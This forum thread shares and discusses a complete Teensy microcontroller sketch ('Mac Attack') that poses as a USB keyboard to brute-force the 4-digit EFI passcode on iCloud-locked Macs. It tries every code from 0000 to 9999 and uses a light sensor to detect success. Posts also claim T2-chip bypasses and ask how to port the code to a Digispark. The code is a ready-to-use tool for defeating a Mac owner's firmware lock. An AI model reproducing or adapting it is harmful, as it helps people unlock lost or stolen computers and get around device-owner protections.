Teensy sketch for EFI and iCloud Bruteforce attack


5 years 3 weeks ago #11128 by RAILEANU
By using an external chip, I need to use just one pin on the Teensy as an interrupt detector, with the code provided anyway. I will definitely keep you updated. In the end it will be a great device that will even work on 2018 or 2019 models that have a 4-digit code only. A 6-digit code is out of the question, as it takes about 197 days at an 8-second code refresh window. Also, I am now working on the T2 chips and have so far managed to bypass 2 computers with external boot disabled. And so far I think I am the only one who has succeeded in doing these models. Same as many years ago, when I found the solution for the 64mb (8.192 Mb) efi file and also the 32 ones, of course with help from others around the world with whom we collaborated. The best help and ideas came from the US at that time.
Keep in touch.

5 years 3 weeks ago #11129 by thaGH05T
Nice, I would like to try and get that info out into the wild. I have not had time to work on 2018+ yet, but it will come as soon as I get this new release off the ground. Collaboration is key though. 

Lemme know if you are interested in helping with product development. I need the extra set of hands.

3 months 1 week ago #12665 by santoslao
Hello, I see that it has been more than 7 years since you shared your knowledge here on the forum, it is a very valuable collaboration. This week I started a saga to solve a project, I confess that I don't have much knowledge but I'm quite curious and I learn easily! I have a teensy 3.1 and I also have a Digispark ATtiny85 + LDR. I was very interested in your code, and I would like to know if there was a way to convert it to Digispark, as I think coding is much simpler for me just starting out. I would like to know if it is possible to implement mouse click simulation or something like that in this code, determining the time of these clicks or keyboard button presses, etc. so that the screen does not go off while testing the codes.

thaGH05T wrote: Well, nobody has given me any feedback which I find pretty strange since I made huge improvements on the code. Even though nobody is following this yet I have updated the code to do the following:

  • Use 4 digit 7 segment display to show entered key and display saved/found key.
  • Save last entered key into EEPROM in case of power failure and to preserve found key.
  • Improved variable declarations for ease of use and customization.
  • Improved LDR logic for detecting when the correct code is entered.

I will be taking a video for demonstration and instructional use soon...
/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                   MODIFIED: 3/13/2016 |
| AUTHOR: John Neal                   ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previously set.          |
| Additionally it is able to detect when the correct code has been entered by using an LDR. |
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick        |
| variable setting. Port over to LCD for usability and versatility of configuration and     |
| attack methods.                                                                           |
\*******************************************************************************************/

/*******************************************************************************************\
| WARNING: This sketch potentially writes 10,000 times to a single address of memory.       |
| Each address can become unreadable after 100,000 writes, so it is recommended that you    |
| change saveAddress before each use.                                                       |
\*******************************************************************************************/

#include <usb_keyboard.h>
#include <SevSeg.h>
#include <EEPROM.h>

const int readPin = A0;                         // Analog read pin of the LDR.
const int ledPin = 13;                          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";                    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;                            // Brute force eventuality, how high to count.
int iterDelay = 14000;                          // Iteration delay, adjust as needed.
int lightThresh = 100;                          // Threshold of LDR, depends on resistor value.
int saveAddress = 1337;                         // Address where the last entered digit is stored.
byte numDigits = 4;                             // Number of digits your 7 segment display has.
byte digitPins[] = {9, 10, 11, 12};             // Digit pins, has to be in order from first to last digit.
byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8};  // Segment pins, has to be in order from A to G. Last array object should be the "." dot.
char code[4];                                   // Define how many digits are in the code array. (change this to the count of bfDigits)
int setupDelay = 5000;                          // This is the time in milliseconds that the EFI code or last number entered will be displayed as well as how -->
                                                // long the initial countdown to start brute forcing will be.
SevSeg sevseg;                                  //Instantiate a seven segment object.

void setup() {
  sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins);
  sevseg.setBrightness(10);
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  //Serial.begin(9600);           // Begin serial if calibrating lightThresh.

  int efiStartTime = millis();
  int efiEndTime = efiStartTime;
  int savedEFI = readWord(saveAddress);
  while ((efiEndTime - efiStartTime) <= setupDelay){
    sevseg.setNumber(savedEFI,5);
    sevseg.refreshDisplay();
    efiEndTime = millis();
  }
}

int bfCount = 0;  //readWord(saveAddress);          // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure.
int doOnce = 1;

void loop(){
  if (doOnce == 1){
    int startTime = millis();
    int endTime = startTime;
    while ((endTime - startTime) <= setupDelay + 10){
      int delayMath = endTime / 1000 - 10;
      int modDelay = delayMath * -1;
      sevseg.setNumber(modDelay,5);
      sevseg.refreshDisplay();
      endTime = millis();
    }
    doOnce = 0;
  }
  
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (bfCount <= bfDigits){
      sprintf(code, digits, bfCount);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      
      int startTime = millis();
      int endTime = startTime;
      while ((endTime - startTime) <= iterDelay){
        sevseg.setNumber(bfCount,5);
        sevseg.refreshDisplay();
        endTime = millis();
      }
      bfCount++;
      writeWord(saveAddress, bfCount);
    }
    else if (bfCount > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    writeWord(saveAddress, bfCount);
    while (1){
      sevseg.setNumber(bfCount,5);
      sevseg.refreshDisplay();
    }
  }
}

void writeWord(unsigned address, unsigned value){
  EEPROM.write(address, highByte(value));
  EEPROM.write(address+1, lowByte(value));
}

unsigned readWord(unsigned address){
  return word(EEPROM.read(address), EEPROM.read(address+1));
}

For those of you who are thinking this is too good to be true, you're welcome. For those of you who have no idea what to do with this, don't worry, the tutorial is coming soon and I will be creating a shield for the Teensy xx :)
